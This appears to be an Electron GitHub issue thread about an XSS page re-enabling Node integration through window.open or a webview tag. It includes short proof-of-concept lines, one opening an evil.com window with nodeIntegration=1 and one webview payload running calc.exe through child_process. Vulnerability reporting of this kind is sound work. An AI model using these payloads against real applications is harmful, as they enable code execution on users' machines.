### ISSUE TITLE
Prohibit `nodeIntegration` from being re-enabled with `window.open`

### ISSUE THREAD

**Issue by wearhere** [atom/electron#4026]
A developer might disable Node integration in a browser window to limit the damage that an XSS attack could cause. But if an XSS attack could open a window to its own endpoint and, when opening the window, re-enable Node integration, this is moot:

```js
// JavaScript on 'evil.com' will be able to `require('fs')` etc.
window.open('http://evil.com', '', 'nodeIntegration=1');
```

**Comment by wearhere** [comment]
Related: https://github.com/atom/electron/issues/3943.

I think that @paulcbetts suggested this [here](https://github.com/atom/electron/issues/3921#issuecomment-167716088) and @zcbenz appeared to concur [here](https://github.com/atom/electron/issues/3921#issuecomment-167721369).

**Comment by lukeapage** [comment]
Imo window.open should inherit properties of the parent as well (like icon etc). 

From a security perspective though, you might get a false sense of security. Electron doesn't have Chromes sandbox and there might be inadvertent ways into the node code even with node integration off.  E. G.  That icon I mentioned allows a remote page to get node to load a file from the file system.

**Comment by wearhere** [comment]
That's a good point @lukeapage. But I don't think that a false sense of security is a reason to not make improvements to security where possible.

In this case I think we could even close the hole you mention. What about, if Node integration is off in the parent, having certain features—not just `nodeIntegration`, but also `icon` and perhaps other `BrowserWindow` options—be ignored in calls to `window.open`? (And have the new window just inherit those options from the parent.)

**Comment by lukeapage** [comment]
No its not a reason not to do it, I agree and it would help with compatibility. It should effect web views too. If its to disable other window features as you suggest, I think that should be a new option - many disable node integration for compatibility but still want accesss to the window.open functionality..

**Comment by hasegawayosuke** [comment]
webview tag can also be re-enabled node-integration.
<webview nodeintegration src="data:text/html,<script>require('child_process').exec('calc.exe',function(){})</script>"></webview>

**Comment by denistsoi** [comment]
@wearhere @zcbenz 
Was looking under ElectronDevTools (in Chromium Dev Tools).

Regardless of `nodeIntegration=0` in the `BrowserWindow`, you can still access native node modules via 
Chrome Dev Tools.

Was trying to find a way to null `window.open` (but discovered `override.js` exports window.open to  BrowserWindowProxy).

I haven't figured out how to gain access to `fs.js` yet - within terminal - but somehow i feel it's entirely feasible if I'm able to access this in Chrome Dev Tools.

Question: Should I be able to access this in Chromw Dev Tools?

<img width="712" alt="screen shot 2016-01-26 at 4 01 44 pm" src="https://cloud.githubusercontent.com/assets/3061779/12575619/e2f9908a-c448-11e5-938a-d1e97db07c1e.png">

**Comment by paulcbetts** [comment]
Chrome DevTools has Magic Powers Of V8 Inspection that the normal DOM doesn't have - access via DevTools is probably okay, as long as you can't find an exit that isn't via normal JS

**Comment by mediaslav** [comment]
here's my quick hack to fix that

```javascript
  var _wopen = window.open;
  window.open = function (a, b, c) {
    console.debug('window.open proxy call:', arguments);
    c = c || '';
    var ca = c.split(',');
    ca.push('nodeIntegration=0');
    c = ca.join(',');
    var win = _wopen.call(window, a, b, c);
    return win;
  };
```

**Comment by wearhere** [comment]
@mediaslav if XSS is a possibility—if a malicious script could call `window.open` at all—then it could also undo that patch.
